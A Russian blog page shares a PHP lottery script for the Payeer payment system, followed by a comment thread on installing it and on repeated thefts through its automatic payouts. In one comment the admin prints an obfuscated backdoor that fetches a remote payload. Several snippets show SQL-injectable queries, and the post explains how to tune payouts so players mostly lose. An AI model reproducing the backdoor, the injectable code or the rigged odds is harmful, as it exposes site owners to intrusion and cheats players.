Купить скрипт

Реклама




Опросы

Каких скриптов не хватает ?

Просмотреть результаты

Загрузка ... Загрузка ...

Контакты

Почта для связи

mexanus@protonmail.com

WMID 133443326071

R341885382783

Payeer

P63968199

 

Последние сообщения на форуме

Настройка скрипта
Матрица BigTrush
Скрипт лотереи

 Обратите внимание что все скрипты взяты из открытых источником и я проверяю их только на наличие критических ошибок, потому вероятность вредоносных кодов и чужих ссылок очень высока по мере сил я исправляю  скрипты  но нет никакой гарантии что в дальнейшем в работе скриптов не будет проблем. Особо стоит обратить внимание на подключение автовыплат к скриптам ферм как показала практика они очень уязвимы. Не забудьте проверить скрипт на уязвимость 

Скрипт лотереи

Скрипт лотереи

Сегодня рассмотрим скрипт лотереи. Если быть точнее то беспроигрышной лотереи. По крайней мере так было написано там где я его скачивал, а каким быть этому скрипту зависит от Вас. Изначально я даже удивился такое пафосное название, а на деле скрипт выдавал процентов 90 проиграша ну да то все дело в настройках.

скрипт лотереи

И так легкое описание

Суть скрипта проста после небольшой регистрации пользователь имеет возможность прикупить лотерейных билетов. И через одну минуту произойдет розыгрыш. Билетов шесть видов разных номиналов. Выигрыш тоже  разный всего десять позиций на каждый номинал лотереи. Есть так же рефсистема. Скрипт работает с платежной системой Payer.

скрипт лотереи

скрипт лотереи



скрипт лотереи

Скрипт простенький и админки не имеет. Но по сути она и не нужна.

Об установке.

Сложного в установке так же ничего нет. Берем создаем базу данных и загружаем скрипт на хостинг.

Как создать базу данных

Как загрузить файлы на хостинг

Следующее что нужно сделать прописать название базы данных имя пользователя к ней и пароль в файле  bd.php который находится в папке block

Где то так

<?php
$db=mysql_connect(“localhost”,”Пользователь базы данных”,”Пароль к базе”);
mysql_select_db(“Название базы данных”,$db);
?>

localhost как правило не меняем тут зависит от хостинга.

Теперь о том как можно настроить скрипт без админки.

Прежде всего если у Вас есть желание изменить ситуацию с выигрышами то нужно подредактировать файл  bilety.php

В нем ищем фрагменты вот такого кода и исправляем там расценки выигрышей.

if($_GET[‘b’] == 100) {
$rand[0] = 30;
$rand[1] = 40;
$rand[2] = 60;
$rand[3] = 70;
$rand[4] = 90;
$rand[5] = 100;
$rand[6] = 200;
$rand[7] = 400;
$rand[8] = 700;
$rand[9] = 1000;

Немного разжую что бы было понятно 100 в первой строке это номинал билета. Остальные цифры 30 40 60 70 90 и тд это возможный выигрыш при покупке лотереи 100

При таких расценках пользователь разорится довольно быстро так как выигрыши больше 100 практически отсутствуют. Я ради проверки по клацал немного.

Для выплат и пополнения редактируем файлы  pay.php и popolnenie.php

По поводу работоспособности и уязвимости

На первый взгляд скрипт работает нормально есть конечно мелкие недоработки но ничего критического. Самое первое что бросилось не работает статистика на сайте постоянно 11 человек онлайн. но последний выигрыш показывает исправно. Так же нет возможности перейти на некоторые страницы такие как FAQ. Это все конечно не существенно и исправимо.

В плане уязвимостей то как же без них в скрипте их тридцать штук удалять конечно не стал.


Велика вероятность накрутки баланса 

В архиве находится база данных и архив со скриптом.

Скачать скрипт  

 

257 комментариев к записи Скрипт лотереи

  • сергей сказал:

    этот скрипт постоянно взламывают вот такая картинка в базе данных после взлома
    683
    Boom

    176.59.77.68
    0
    09.03.2018 19:07
    -60.00

    видна в базе данных что у игрока минус сумма возможна с этим бороться или нет
    через какой файл мог произойти такой взлом

  • admin сказал:

    не помешало бы проверить его на уязвимости https://mexanus.ru/glavn/usstra/uyazvimosti/

  • сергей сказал:

    проверил весь скрипт в но есть одно но в файле status.php после замены 36 строки
    после оплаты баланс участника не меняеться баланс остаётся 0 груб
    ставлю 36 страку на место все работает
    что с этим делать или оставить как есть

    код родной который был
    mysql_query (“UPDATE users SET money=money ‘”.$_POST[‘m_amount’].”‘, rand=’0’ WHERE login='”.$myrow[‘login’].”‘ LIMIT 1″);
    изменил на этот

    mysql_query (“UPDATE users SET money=money ‘”.mysql_real_escape_string($_POST[‘m_amount’]).”‘, rand=’0’ WHERE login='”.$myrow[‘login’].”‘ LIMIT 1″);

  • admin сказал:

    оставляйте как есть это обработчик платежа но не забывайте что сканер это хорошо но скорее всего он все уязвимости не найдет потому как вариант не держать все деньги на кошельке для выплат

  • сергей сказал:

    посмотрю что будет после сканера самому интересно взломают или нет
    спасибо вам за совет

  • admin сказал:

    За время существования сайта Вы второй который говорит о взломе сразу после первого случая я создал страницу про уязвимости вроде помогло больше у него не взламывали но конечно методы совершенствуются и сто процентной гарантии быть не может. Это как вечная борьба оружия и брони. Единственный верный вариант не держать все яйца в одной корзине.

  • сергей сказал:

    увы но сканер не помог опять взломали

  • admin сказал:

    мне стало интересно и я решил глянуть файлы на предмет подозрительности вот что я увидел папка images2 файл Thumbs.db что это за файл не понятно но ему явно не место в папке картинок сканер его пропустил потому что он закодированый внутри да и название какое то подозрительное такой же файл в папке images и в главной папке нужно удалить все три и проверить скрипт на работоспособность если будет работать то уязвимость в них если нет то придется вычеркивать скрипт и работоспособных с закодированым файлом ничего не сделаешь

  • сергей сказал:

    файлы удалил скрипт работает нормально но скрипт все ровно взломали
    вот так выглядит в статистики вывода
    52
    Qtsb
    10.00
    16.03.2018 00:07:37
    P84596318
    -10.00

  • admin сказал:

    пускай я просмотрю все файлы а доступа к хостингу ни у кого нет может давали кому настраивать что то

  • сергей сказал:

    а вот данные пользователя из базы данных который взломал скрипт

    845
    Qtsb
    111111
    176.9.136.47
    0
    16.03.2018 00:06
    -10.00
    0
    0.00
    P84596318
    1521148060
    0

    видно по времени что понадобилось для взлома буквально минуту наверно серьёзный инструмент у хакера

  • admin сказал:

    Или имеется хорошая дыра в скрипте буду смотреть но гарантий никаких в идеале вообще автовыплаты не включать в любом скрипте из информации по взломщику можно заблокировать ему вход по ip это не панацея конечно но нестоит упрощать взлом

  • сергей сказал:

    поставил запрет на ip адрес посмотрим что из этого выйдет время покажет если взломают или не взломают
    напишу обязательно

  • admin сказал:

    IP не сложно сменить тут нужно каждый файл перебирать с паером все не так просто есть мнение что сам паер и подкрадает

  • сергей сказал:

    чтобы было немного понятней я снял краткий обзор что видно в базе данных после взлома
    лучше один раз увидеть ссылка на видео https://youtu.be/9Jv2YYzCTqw

  • admin сказал:

    пишет видео не доступно

  • сергей сказал:

    попробуйте снова видать допустил ошибку ссылка https://youtu.be/9Jv2YYzCTqw

  • admin сказал:

    любопытно скорее всего придется устанавливать смотреть файлы посмотрел ничего подозрительного не увидел вернее все не понравилось

  • сергей сказал:

    опять взломали только ip адрес другой а кошелек тот который был
    не подскажете как выводы сделать в ручном режиме

  • admin сказал:

    можно приспособить какой нибудь из модулей для фруктовой фермы но это потребует значительного переделывания как модуля так и самого скрипта самый простой вариант написать на странице вывода выигрыш выплачивается по достижению определенной сумы на балансе либо как более жесткий вариант обратитесь за выиграшом с помощью WMID и прописать свой вмид. И выплачивать прямым переводом с кошелька.

  • admin сказал:

    я кстати не нашел дыру в скрипте все не нравится слишком много переменных из вне $_POST и $_GET

  • admin сказал:

    еще нюанс сканер не все исправляет но все подозрительное показывает вот такой фрагмент не попадался когда сканировали
    } if (!isset($_COOKIE[base64_decode(‘X3ltXl1cw==’)])) { @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29tL3Av’).$_SERVER[‘HTTP_HOST’]); @setcookie(base64_decode(‘X3X2l1cw==’), 1, time() 31536000, ‘/’, $_SERVER[‘HTTP_HOST’]); } if (isset($_COOKIE[base64_decode(‘cmVkNHU=’)])) { @file_put_contents(base64_decode(‘c3hdGUucGhw’), @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29tL2QudHh0’))); }
    Или что то похожее ?

  • сергей сказал:

    если и попадался то сканер исправил я думаю разве все упомнишь сканировал снова
    сканер показывает тоже самое о чем я писал ранее
    даже незнаю каким методом можно проверить дополнительно

  • admin сказал:

    может есть смысл поискать другой скрипт

  • сергей сказал:

    наверно дело тут не в скрипте скрипт отличный в течение пол года скрипт ломал один человек
    это можно видеть куда уходили деньги сюда -P84596318 любопытно другое как только я отключил
    авто выплаты буквально через 6 часов я прошу заметить что скрипт простоял пол года
    блокируют хостинг вот что написали

    Здравствуйте, На территории РФ для размещения хайп-проектов(проектов, которые подразумевают под собой получение денег от клиентов с последующим возвратом с процентами) вам нужно обратиться в Центральный банк РФ с просьбой выдать лицензию, предоставляющую право на прием депозитных вкладов от частных лиц в рублях и иностранной валюте. Далее обратиться к нам с полным пакетом документов, и мы разрешим размещение данного сайта.

    наверно это кто то из работников beget возможна такое как вы думаете

    может посоветуете недорогой хостинг

  • admin сказал:

    Все возможно только каким образом лотарея на хайп похожа не понятно буду у компьютера дам ссылку на дешовый хостинг

  • admin сказал:

    Вот https://justhost.ru/ дешевле не придумать платите только за место от 30 копеек в месяц

  • admin сказал:

    Насчет работников бегет все возможно у них точно доступ ко всем файлам есть и к базе данных тоже нужно отзывы про этот хостинг почитать я на нем никогда не был

  • сергей сказал:

    спасибо за ссылку по крайне мере не блокируют

  • admin сказал:

    а деньги воруют или нет ?

  • сергей сказал:

    деньги воровать перестали
    правда была регистрация с замеченным ранее кашельком и ip адресом
    но взлома не была поднял огранечения вывода до 20 руб
    на щету всегда рублей 18 взломы прекротились

  • EVg сказал:

    Thumbs.db Это файл кэширования от системы Windows. Раньше тоже думал что херня появляется после того как на комп сайт перетащу из Filezila, а это виндовс картинки кэширует оказывается. Thumbs.db вообще не должно быть видно на винде так как он скрытый тип имеет.
    Дыры у сайтов-точнее шелы это когда в папке js например лежит jquery.php или в папке картинок image.php
    название у файлов не вызывает подозрений, а ВОТ РАСШИРЕНИЕ-PHP ВМЕСТО JS и GIF соответственно. Внутри них обычно закодированный код-форма авторизации для проникновения к базе,хостингу…
    Возможно чтоб обезопасится может помочь изменение имени пути админки ИЛИ полного её удаления и управление через базу данных.

  • EVg сказал:

    чтобы онлайн работал на index.php 23 строке 10 поменять на ноль- сайт если никого нет даже накидывает 10 онлайн человек.

  • Дима сказал:

    Регистрация не работает.

  • admin сказал:

    попробуйте сменить версию php на 5.3

  • Дима сказал:

    Спасибо. Можно Вашу почту?

  • Дима сказал:

    admin, спасибо. Можно Вашу почту?

  • admin сказал:
  • Володя сказал:

    Я Вам в почту отписался.

  • Cергей сказал:

    как я не бился не пытался нечего не выходит все дело наверно в этом _loginCtrl.php файле
    выдает ошибку можно видеть на сайте
    ссылка на сам скрипт
    может что и подскажете вот весь код этого файла

    $config->client_id,
    ‘redirect_uri’ => $config->redirect_uri,
    ‘scope’ => ’email,photos’,
    ‘response_type’ => ‘code’
    );

    $data[‘auth’] = $url . “?” . urldecode(http_build_query($params));

    if (isset($_GET[‘code’])) {
    $result = false;

    $params = array(
    ‘client_id’ => $config->client_id,
    ‘client_secret’ => $config->client_secret,
    ‘code’ => $_GET[‘code’],
    ‘redirect_uri’ => $config->redirect_uri
    );

    $token = json_decode(file_get_contents(‘https://oauth.vk.com/access_token’ . ‘?’ . urldecode(http_build_query($params))), true);

    if (isset($token[‘access_token’])) {
    $params = array(
    ‘uids’ => $token[‘user_id’],
    ‘fields’ => ‘uid,first_name,last_name,photo_100’,
    ‘access_token’ => $token[‘access_token’]
    );

    $userInfo = json_decode(file_get_contents(‘https://api.vk.com/method/users.get’ . ‘?’ . urldecode(http_build_query($params))), true);
    if (isset($userInfo[‘response’][0][‘uid’])) {
    $userInfo = $userInfo[‘response’][0];
    $result = true;
    }
    }

    if ($result) {

    $uid = $userInfo[‘uid’];
    $email = $token[“email”];
    $first_name = $userInfo[‘first_name’];
    $last_name = $userInfo[‘last_name’];
    $screen_name = $first_name . ‘ ‘ . $last_name;
    $photo_100 = $userInfo[‘photo_100’];

    $ref_1 = 0;
    $ref_2 = 0;
    $ref_3 = 0;

    $db->Query(“SELECT * FROM users WHERE uid = ‘{$uid}'”);
    $user_data = $db->FetchArray();

    /*
    if($user_data[‘id’] != 1){

    $db->Query(“SELECT COUNT(*) FROM users WHERE ip = ‘{$ip}'”);
    if (intval($db->FetchRow()) > 1){

    $db->Query(“SELECT * FROM users WHERE ip = ‘{$ip}'”);
    $ban_data = $db->FetchAll();

    foreach($ban_data as $ban){
    if($user_data[‘id’] != $ban[‘id’]){
    $db->Query(“UPDATE users SET ip = ‘0’ WHERE id = ‘{$ban[‘id’]}'”);
    }
    $db->Query(“UPDATE users SET ban = ‘2’ WHERE id = ‘{$ban[‘id’]}'”);
    }
    }

  • admin сказал:

    строка в которой ошибка ссылается на oauth.vk.com/access_token насколько я понимаю в контакте нужно регистрировать свой сайт в инструкции есть что то

  • Сергей сказал:

    не могу поменять баланс дело в том когда я меняю выигрыш меньше рубля 0.70 и так далее
    то при розыгрыше выигрыш 0 когда когда меняю на 1 все нормально
    if($_GET[‘b’] == 1) {
    $rand[0] = 0.10;
    $rand[1] = 0.20;
    $rand[2] =0.30;
    $rand[3] = 0.40;
    $rand[4] = 0.50;
    $rand[5] = 1;
    $rand[6] = 2;
    $rand[7] = 3;
    $rand[8] = 4;
    $rand[9] = 5;

    а где сделать настройку я не нашел может кто подскажет где что нужно поправить

  • admin сказал:

    Нужно ставить смотреть так не скажу но подозреваю что просто прописано целое число стоит попробовать что то типа 1.5 посмотреть что будет я бы первым делом полез в базу данных скорее всего загвоздка там

  • Серей сказал:

    попробовал таким образом
    $rand[0] = 1.5;
    $rand[1] = 1.6;
    $rand[2] = 1.3;
    $rand[3] = 1.4;
    $rand[4] = 1.7;
    $rand[5] = 1.8;
    $rand[6] = 1.3;
    $rand[7] = 1.4;
    $rand[8] = 1.2;
    $rand[9] = 1.1;
    при розыгрыши разыгрывается однозначная число после точки па идеи должно 1.7 но нет выигрыш 7
    а где примерно искать в базе данных

  • admin сказал:

    Смотрите в структуре таблиц float это дробные числа а int целые
    но может быть и в самом скрипте округление быть

  • guziknik сказал:

    При пополнении деньги в магазин приходят а на счет аккаунта не идут, в чем может быть проблема.Что нужно прописывать в настройке мерчанта?

  • admin сказал:

    Скорее всего ошиблись в URL обработчика в настройках мерчанта он должен быть вот такой

    http://Ваш сайт/status.php

  • guziknik сказал:

    Сделал ststus.php изменений нет.

  • guziknik сказал:

    status.php

  • admin сказал:

    Покажите картинку что вы прописали в мерчанте возможно ошибка

  • admin сказал:

    На картинке все верно единственное вопрос у Вас http или https еще есть вариант не на всех хостингах пополнение работает но пускай буду на месте подключу посмотрю

  • guziknik сказал:

    http хостинг webhost php 5.3

  • guziknik сказал:

    Не смотрели? Кстати насколько я помню файлов fail и success в скрипте не было я их из другого скрипта добавил, может зря?

  • admin сказал:

    Проверил все работает насчет файлов fail и success они в скрипте есть но из за них такой ошибки быть не может тут только все связанное с обработчиком status.php в нем кстати так же нужно прописать секретный ключ
    $m_key = “ygcTOireS56ughZn”; если его не прописать то работать не будет
    И не забывайте что на данном скрипте замечена накрутка нужно быть предельно осторожным с автовыплатами для них завести отдельный кошелек и не держать на нем значительных сумм

  • guziknik сказал:

    Спасибо ключ не прописан был все заработало.

  • admin сказал:

    Пожалуйста обращайтесь

  • сергей сказал:

    здравствуйте не давно скачал скрипт лотереи на другом форуме как я не старался установить
    этот скрипт хоть лопни не работает авторизация через vk
    кликою войти потом разрешить но перекидывает на начальную страницу
    автор утверждает что скрипт рабочий ответ у него один мыл кривые руки
    хотя вроде все правильно я установил

    вот вам новая тема новый материал негде нет инструкции по установки этого скрипта
    надеюсь вы разберетесь и выложите этот скрипт для всех добавив в коллекцию этого форума

    скрипт можно скачать здесь <>
    Демо этого скрипта <>

  • сергей сказал:

    скрипт можно скачать здесь
    Демо этого скрипта

  • сергей сказал:

    скрипт можно скачать здесь https: //yadi.sk/d/-qFdRaJo7qPxDw
    Демо этого скрипта http: //lotorey.ru/signin/

  • сергей сказал:

    нужна убрать пробел после http:

  • admin сказал:

    Мне попадался такой скрипт но скорее всего тут я не помогу vk у меня заблокирован но пускай гляну файлы

  • сергей сказал:

    посмотрите может хоть вам удастся объяснить по подробней .

  • сергей сказал:

    данные vk не проблема куда выслать логин и пароль

  • admin сказал:

    Данные не нужны мне что бы попасть в вк нужно пользоватся различными анонимайзерами это не проблема если нужно просто зайти и почитать. Но тут нужно подключить api vk я еще не смотрел но в моем понимании нужно гдето в вк найти api как подключать. Скорее всего с вк берется логин и пароль но не тот что для входа а для api и прописывается в админке. Это в общем точнее скажу как посмотрю

  • admin сказал:

    в общем как я и думал нужно взять id и секретный ключ с вк и прописать в базе данных таблица contacts строки vk_id и vk_secret или через админку там я не смотрел но думаю это в параметрах сайта. ID и ключ скорее всего берутся от сюда https://vk.com/editapp?act=create но я проверить не могу из за блокировки постоянно сбивается страница в общем по моему пониманию там нужно зарегистрировать сайт и от туда взять данные которые прописываются в базе. Кстати я слышал много не хорошего о данном скрипте я бы не стал подключать автовыплаты на нем.

  • сергей сказал:

    спасибо большое что вы посмотрели и не отказали сейчас это большая редкость
    то что вы описали да все верно я подключал vk через базу данных id и vk_secret
    но бесполезно авторизация работать не хочет а самое главное что са всеми похожими скриптами
    одна проблема это авторизация некто не может разобраться з данной проблемой

  • сергей сказал:

    очень странное дело почему нет не одного скрипта с рабочий авторизацией через vk
    я наверно перепробовал уже наверно штук 35 но без результатно

  • admin сказал:

    Попробуйте сменить в файле /pages/controllers/signin.class.php 35 строку

    $url = ‘https://api.vk.com/method/users.get’ . ‘?’ . urldecode(http_build_query($params));

    на вот такую

    $url = ‘https://api.vk.com/method/users.get?&v=3.0’ . ‘?’ . urldecode(http_build_query($params));

  • сергей сказал:

    строку поменял кликою войти на сайт белый экран
    Сайт lotorey.ru пока не может обработать этот запрос

  • admin сказал:

    белый экран это всегда ошибка проверте строку что меняли возможно точку с запятой в конце не поставили

  • сергей сказал:

    вот сам код строку заменил все нормально вот сам код

    model->getAllFromById(‘contacts’,1);
    $params = array(
    ‘client_id’ => $info[‘vk_id’],’display’ => ‘page’,
    ‘client_secret’ => $info[‘vk_secret’],
    ‘code’ => $_GET[‘code’],
    ‘redirect_uri’ => HREF_DOMAIN.’signin/’,’v’ => ‘3.0’ ,
    );
    $url = ‘https://oauth.vk.com/access_token’ . ‘?’ . urldecode(http_build_query($params));

    $res = request($url);
    $token = json_decode($res, true);
    if (isset($token[‘access_token’])) {
    $params = array(
    ‘uids’ => $token[‘user_id’],
    ‘fields’ => ‘uid,first_name,last_name,screen_name,photo_100,email’,
    ‘access_token’ => $token[‘access_token’],’v’ => ‘3.0’ ,
    );
    $url = ‘https://api.vk.com/method/users.get?&v=3.0’ . ‘?’ . urldecode(http_build_query($params));
    $res = request($url);
    $uinfo = json_decode($res, true);
    if(!empty($uinfo[‘response’][0])){
    $uinfo[‘response’][0][’email’]=$token[’email’];
    $this->model->auto($uinfo[‘response’][0]);
    header( ‘Location: /?room=1’ );
    }
    }

    }
    $pageData=$this->model->getAllFromByAlias(‘site_pages_constant’, ‘signin’);
    $this->view->setTemplateVar(‘pageData’, $pageData);
    // meta-информация
    $this->view->setTitle($pageData[‘meta_title’]);
    $this->view->setKeywords($pageData[‘meta_keywords’]);
    $this->view->setDescription($pageData[‘meta_description’]);
    }
    }

  • admin сказал:

    в этом куске ошибки нет покрайней мере синтаксической

  • Василий сказал:

    Вопрос, установил всё как надо, зарегистрировался, выхожу с сайта. Захожу обратно ввожу лог пар и ничего не происходит

  • admin сказал:

    а скрипт от сюда скачивали или нет что то я не пойму у Вас кнопка входа отправляет на несуществующую страницу

  • admin сказал:

    у меня такой проблемы нет кукую версию php вы используете ?

  • admin сказал:

    странно у Вас скрипт совсем плохо работает и проблема не только в кнопке входа он и бонусы за посещение раздает постоянно какой хостинг у Вас гляну может установлю туда вот я на вебхост установил http://andre191.s31.wh1.su/

  • admin сказал:

    Тестового периода нет проверить не смогу тут вам либо другой скрипт искать либо брать другой хостинг подозреваю настроить этот будет не просто

  • admin сказал:

    это предпочтительней на этом скрипте была замечена накрутка баланса

  • сергей сказал:

    наверно можно установить какую нибудь защиту против взлома

  • admin сказал:

    С этим скриптом не все понятно возможно скрипт и не виноват на сколько я помню человек жаловался на сотрудников хостинга но не пойман не вор пока грешу на скрипт

  • admin сказал:

    да скриптов лотерей не так уже и много по функционалу фастлото будет получше но обычно в них проблема с подключением входа VK попробуйте его хотя я его и не проверял

  • сергей сказал:

    а если весь скрипт беспроигрышной лотереи переписать Обфусцированный код это как то осложнит
    доступ взломщику или нет что можете посоветовать стоит попробовать или нет смысла

  • admin сказал:

    Попробовать всегда стоит но как я говорил ранее возможно скрипт и не взламывали а все дело в жадных работниках хостинга от такого обфусцированный код не спасет но если есть возможность усложнить взлом то почему бы и нет.

  • сергей сказал:

    здравствуйте как можно ограничить регистрацию пользователей
    чтобы пользователь немог зарегистрироваться 2 раз

  • admin сказал:

    Приветствую обычно в файл регистрации добавляют проверку ip это конечно не панацея но немного усложнит повторную регистрацию.

  • сергей сказал:

    а как это сделать нужен наверно какой нибудь скрипт или код
    можно немножко поподробней как это можно устроить

  • admin сказал:

    Для этого скрипта я так понимаю сегодня гляну

  • сергей сказал:

    да для этого жду с нетерпением ответа
    или к примеру не ip а например ограничить чтобы пользователь не мог повторно использовать
    один и тот же кошелек

  • admin сказал:

    Если проверять кошелек то нужно добавить в файле /registr.php после вот этого

    if(!preg_match_all(“/[P]+[\d]{5,15}/”,$_POST[‘payeer’],$payeer)){$error = ‘Неверный кошелёк!’;else{

    вот такое выражение

    $result1 = mysql_query(“SELECT payeer FROM users WHERE payeer='”.$_POST[‘payeer’].”‘”,$db);
    if(mysql_num_rows($result1) > 0){$error = ‘Такой кошелек уже зарегистрирован!’;}else{

    и еще немного ниже после вот этого

    if($true){echo “ Ответить

  • сергей сказал:

    спасибо все добавил но когда открываю страницу регистрации появляется белый экран
    сайт ———— пока не может обработать этот запрос

  • admin сказал:

    белый экран всегда ошибка вот ссылка на дополненный файл https://drive.google.com/open?id=1QU52ePOXiLnPBuzCIVkabjj4doYNXTfr

  • сергей сказал:

    что та видно не так добавляю код
    открываю страницу регистрации появляется белый экран
    сайт пока не может обработать этот запрос

  • admin сказал:

    это с тем файлом что я отправил ?

  • admin сказал:

    вот тестовый http://andre191.s31.wh1.su у меня ошибки нет но тут думаю хостинг роль играет на некоторых ошибки отображаются на других нет

  • admin сказал:

    скиньте ссылку на Ваш сайт утром посмотрю ваша ссылка не отобразится тут но я ее все равно увижу

  • сергей сказал:

    спасибо огромное добавил целиком файл все работает отлична

  • сергей сказал:

    здравствуйте как можно ограничить регистрацию пользователей
    чтобы пользователь немог зарегистрироваться 2 раз с одного ip адреса

  • admin сказал:

    Так же как и с кошельком только вместо $result1 написать скажем $result2 и payeer сменить на ip

  • сергей сказал:

    добавил но почемута белый экран может что не так

    $result1 = mysql_query(“SELECT payeer FROM users WHERE payeer='”.$_POST[‘payeer’].”‘”,$db);
    if(mysql_num_rows($result1) > 0){$error = ‘Такой кошелек уже зарегистрирован!’;}else{
    добавил
    $result2 = mysql_query(“SELECT ip FROM users WHERE payeer='”.$_POST[‘ip’].”‘”,$db);
    if(mysql_num_rows($result1) > 0){$error = ‘Такой ip уже зарегистрирован!’;}else{

  • admin сказал:

    стоп так не пойдет я еще подумаю

  • сергей сказал:

    вот так выглядит часть кода
    if(empty($_POST[‘login’])) {$error = ‘Введите логин!’;}else{
    if(empty($_POST[‘pass’])) {$error = ‘Введите пароль!’;}else{
    if($_POST[‘pass’] != $_POST[‘pass2’]) {$error = ‘Пароли не совпадают!’;}else{
    if(!preg_match_all(“/[P]+[\d]{5,15}/”,$_POST[‘payeer’],$payeer)){$error = ‘Неверный кошелёк!’;}else{

    $result1 = mysql_query(“SELECT payeer FROM users WHERE payeer='”.$_POST[‘payeer’].”‘”,$db);
    if(mysql_num_rows($result1) > 0){$error = ‘Такой кошелек уже зарегистрирован!’;}else{

    $result2 = mysql_query(“SELECT ip FROM users WHERE ip='”.$_POST[‘payeer’].”‘”,$db);
    if(mysql_num_rows($result2) > 0){$error = ‘Такой ip уже зарегистрирован!’;}else{

    но все равно на страници регистрации белый экран

  • admin сказал:

    белая страница это ошибка я позже выложу файл регистрации

  • сергей сказал:

    спасибо будем ждать

  • сергей сказал:

    здравствуйте прошлый раз установил ограничение на кошёлек
    но не тут то было хакер опять зарегистрировался на этот же кошёлек
    повторно хотя ограничение на кошёлек работало отлично проверил раз 5
    потом просканировал файл регистрации показала три уязвимости
    исправил .
    мог ли хакер обойти ограничения на кашёлек через эти уязвимости при регистрации .
    например хакер засветил свой кошёлек и не один
    Вот интересно можно или нет как то умудриться поставить запрет на вывод конкретного кошёлька
    или двух что то вроде заглушки для конкретного кошелька

  • admin сказал:

    приветствую все возможно стоит учитывать что любая защита сто процентной гарантии не дает в скрипте секундного бонусника умудрялись сливать деньги даже после того как удалили все уязвимости и где дыра я так и не нашел. Есть еще вариант что это разработчик оставил для себя лазейку и пользуется ее. Возможно есть смысл заблокировать все IP с которых приходит хакер но тоже 100% нет сейчас много всевозможных сервисов которые меняют IP тот же браузер тор. Сто процентную гарантию даст отказ от автовыплат наврятли кому будет интересно создавать кучу аккаунтов не получая при этом денег.

  • сергей сказал:

    так и сделал но заходит с другова ip но вот каошёлек тот же указывает при регистрации
    как то обходит запрет на кошелек
    можно или нет как то умудриться поставить запрет на вывод денег конкретного кошёлька
    или не существует подобных заглушек или кодов незнаю как назвать

  • admin сказал:

    Можно скорее всего нужно посмотреть на файл выплат. Гляну как буду у компьютера.

  • admin сказал:

    Есть вопрос а ты удаляешься его аккаунт или нет потому как та защита сравнивает кошельки те что есть в базе данных и не даёт такому же зарегистрироватся. И если ты его удалил то по новому он зарегистрируется с тем же кошельком.

  • сергей сказал:

    если сказать точнее то я знал его кошелек и зарегистрировался с этим кошельком
    потом попробовал ещё раз зарегистрироваться ограничения сработала
    регистрацию пройти не удалось
    но хакер будто издевается зарегистрировался именно на этот кошелек
    хотя в базе я его не удалял вот пример из базы
    здесь я зарегистрировался сам с его кашельком
    1492
    хакер
    ыфвурщ
    188.162.64.57
    0
    16.12.2018 07:49
    0.00
    0
    0.00
    P84596318
    1544932149

    а через некоторое время хакер

    1501
    HaTaB
    1231238нанап
    178.62.192.172
    0
    16.12.2018 20:05
    -10.00
    0
    0.00
    P84596318
    1544976410
    я все в базе оставил как есть только сменил пороль

  • admin сказал:

    Возможно у него есть доступ к самой базе тогда никакая защита не поможет может есть смысл вообще сменить скрипт. Потому как поставить запрет на выплату определенному кошелька большой проблемы не вижу но и сменить кошелек так же не является проблемой. Не меняет он его только по тому что пока нет необходимости.

  • сергей сказал:

    если бы был доступ к базе он бы накрутил любую сумму а тут видно что после вывода денег
    в базе отображаеться минус -10 или -60
    тоись было 0 а после вывода
    стала минус -10
    и я так думаю когда хакер поменяет раз 5 кошелек ради 10 рублей
    я думаю это ему все таки надоест
    если есть возможность подскажите как сделать ограничения на вывод конкретного кошелька

  • admin сказал:

    Посмотрю а как насчёт варианта выплат только после пополнения но я бы все таки присмотрел новый скрипт этот уж больно древний. Я сегодня глянул одним глазом на сколько позволяет мобильный интернет месяц назад появился новый буржуйский скрипт лотерей он скорее всего на английском но будет поновее и думаю с защитой там будет получше.

  • сергей сказал:

    а где этот скрипт можно скачать и что за лотерея можно подробней

  • сергей сказал:

    насчёт варианта выплат только после пополнения очень хорошая идея
    но как это сделать

  • сергей сказал:

    попробовал это код но видно не хватает чего то
    сколько я бы не пополнел отвечает Выплату могут заказать те кто пополнил счет минимум на 3 рубля

    <?PHP
    # Заглушка от халявщиков
    if($user_data["insert_sum"]
    Выплату могут заказать те кто пополнил счет минимум на 3 рубля

    <?PHP

    return;
    }

  • admin сказал:

    выплаты после пополнения гляну а пока посмотри скрипт Letslotto так и напиши в поиске у буржуев есть демо сайт можно глянуть

  • admin сказал:

    этот код с фруктовой фермы на этом скрипте он работать не будет так как несчем сверять в базе данных нет insert_sum тут нужно разбиратся как будет проще добавить подобную заглушку но уже с теми строками что используются в данном скрипте
    возможно будет иметь смысл добавить еще одну строку в базу данных тогда появится возможность использовать родную заглушку что не дает выводить меньше 10 рублей всяко сегодня не успел ничего

  • сергей сказал:

    нашел я этот скрипт посмотрел скачивал отсюда https:// cloud.mail.ru/public/4Cvj/5TVzTd8Jf
    установил посмотрел даже зарегистрироваться не смог
    ошибки надо исправлять мне в этом не разобраться
    при регистрации нету даже картинки просто белой фон и форма регистрации куда вписать лог-пороль
    и так далее

  • сергей сказал:

    при авторизации выдает ошибку

    Объект не найден!
    Запрашиваемый ресурс не найден. Ссылка на странице неверна или устарела. Пожалуйста, сообщите автору этой страницы об ошибке.

    Если Вы считаете, что это ошибка сервера, пожалуйста, сообщите об этом веб-мастеру.

    Error 404
    localhost
    Apache

  • admin сказал:

    пускай я гляну на выходных поставлю

  • сергей сказал:

    будем ждать

  • Руслан сказал:

    ТРОЕ СУТОК УЖЕ НЕ МОГУ РАЗОБРАТЬСЯ ПО ЧЕМУ ПРИ ПОПОЛНЕНИИ СЧЕТА, ОПЕРАЦИЯ ПРОХОДИТ УСПЕШНО – НО БАЛАНС НА САЙТЕ ОСТАЕТСЯ = НУЛЮ

  • admin сказал:

    Обычно такое бывает если не правильно указать URL обработчика в настройках payeer. Нужно все проверить точки пробелы http или https при малейшей неточности на балансе будет ноль

  • Руслан сказал:

    URL обработчика: http:// nexinvest .ru/status.php
    у меня он такой! Поставил пробелы чтоб ссылка не попала в спам!
    Правильно ?

  • admin сказал:

    Все верно а в самом файле status.php прописали секретный ключ ?

    $m_key = “ygcTOireS56ughZn”;

  • admin сказал:

    и не забывайте что в этом скрипте где то дыра автовыплаты для него противопоказаны

  • Руслан сказал:

    Прописал и секретный ключ – не чего не изменилось… все равно при пополнении счет остается ноль…

  • admin сказал:

    А после url обработчика пробела нет? Ещё есть вариант хостинг на некоторых подключить не получится.

  • Руслан сказал:

    Не знаю что именно сделал, много чего на клацал – пополнение заработало!
    Теперь вывод: не подскажите почему выскакивает эта ошибка: http:// prntscr. com/m72w8m

